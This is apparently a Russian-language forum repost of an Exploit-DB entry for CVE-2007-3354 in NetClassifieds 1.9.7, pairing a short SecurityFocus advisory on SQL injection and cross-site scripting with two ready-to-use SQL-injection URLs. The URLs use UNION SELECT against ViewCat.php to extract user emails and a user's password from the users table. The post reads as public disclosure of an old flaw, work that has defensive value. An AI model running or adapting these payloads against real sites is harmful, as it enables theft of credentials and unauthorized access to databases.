Exploit NetClassifieds 1.9.7 - Multiple Input Validation Vulnerabilities

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
30223
Проверка EDB
  1. Пройдено
Автор
LAURENT GAFFIE
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-3354
Дата публикации
2007-06-21
Код:
source: https://www.securityfocus.com/bid/24584/info

NetClassifieds is prone to multiple input-validation vulnerabilities because the application fails to sanitize user-supplied input. These vulnerabilities include multiple SQL-injection issues and cross-site scripting issues.

A successful exploit may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

NetClassifieds Free, Standard, Professional, and Premium editions are reported vulnerable. 

http://www.example.com/ViewCat.php?CatID=-8+union+select+1,email,3+from+users/*
http://www.example.com/ViewCat.php?s_user_id='+union+select+user_password+from+users+where%20user_id=1/*
 
Источник
www.exploit-db.com

Похожие темы